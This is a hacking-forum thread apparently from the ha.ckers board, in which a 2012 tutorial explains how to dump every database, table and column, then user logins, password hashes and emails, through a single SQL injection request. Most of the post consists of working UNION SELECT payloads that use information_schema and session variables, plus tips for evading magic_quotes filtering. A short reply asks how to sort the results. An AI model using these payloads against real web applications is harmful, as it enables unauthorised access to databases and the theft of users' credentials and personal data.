Paid Advertising is
ha.ckers sla.cking
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
TUTORIAL : [All DB In [1] Request]
Posted by: blackrose
Date: May 31, 2012 04:00PM

greetz to ๖ۣۜDan & DenJacker

What we will be doing is using nested select statements, (subquerys), along with our own variable to bypass the 1024 character limit of group_concat. If you're new to sql, this might look a bit advanced. Just study the code, though. Using this, you can get all the info you need in 2 requests.

First of, the database/table/columns.

(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0a,' [ ',table_schema,' ] >',table_name,' > ',column_name))))x)

PoC:' UNION SELECT 1,2,3,4,5,(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0a,' [ ',table_schema,' ] > ',table_name,' > ',column_name))))a)--+

Of course, if magic_quotes is enabled you would need to bypass using quotations by using hex values, or using the char() function.

View the source, and we see every single database/table/column accessible.


Now, to grab information from the columns.

(select (@) from (select (@x:=0x00),(select (@) from (database.table) where (@) in (@:=concat(@,0x0a,columns)))x)

POC' UNION SELECT 1,2,3,4,5,(select(@) from (select (@:=0x00),(select (@) from (test.pp_users) where (@) in (@:=concat(@,0x0a,ID,0x3a,user_login,0x3a,user_pass,0x3a,user_email))))a)--+

Thanks for viewing this tutorial. If you need help, post below. If you have anything you want added, post below or pm me. Thanks

Options: ReplyQuote
Re: TUTORIAL : [All DB In [1] Request]
Posted by: Freesia
Date: July 06, 2014 07:25AM

Thank you blackrose, very nice trick!
my question is how can I order the results, for example in your demo order by ID

Options: ReplyQuote

Sorry, only registered users may post in this forum.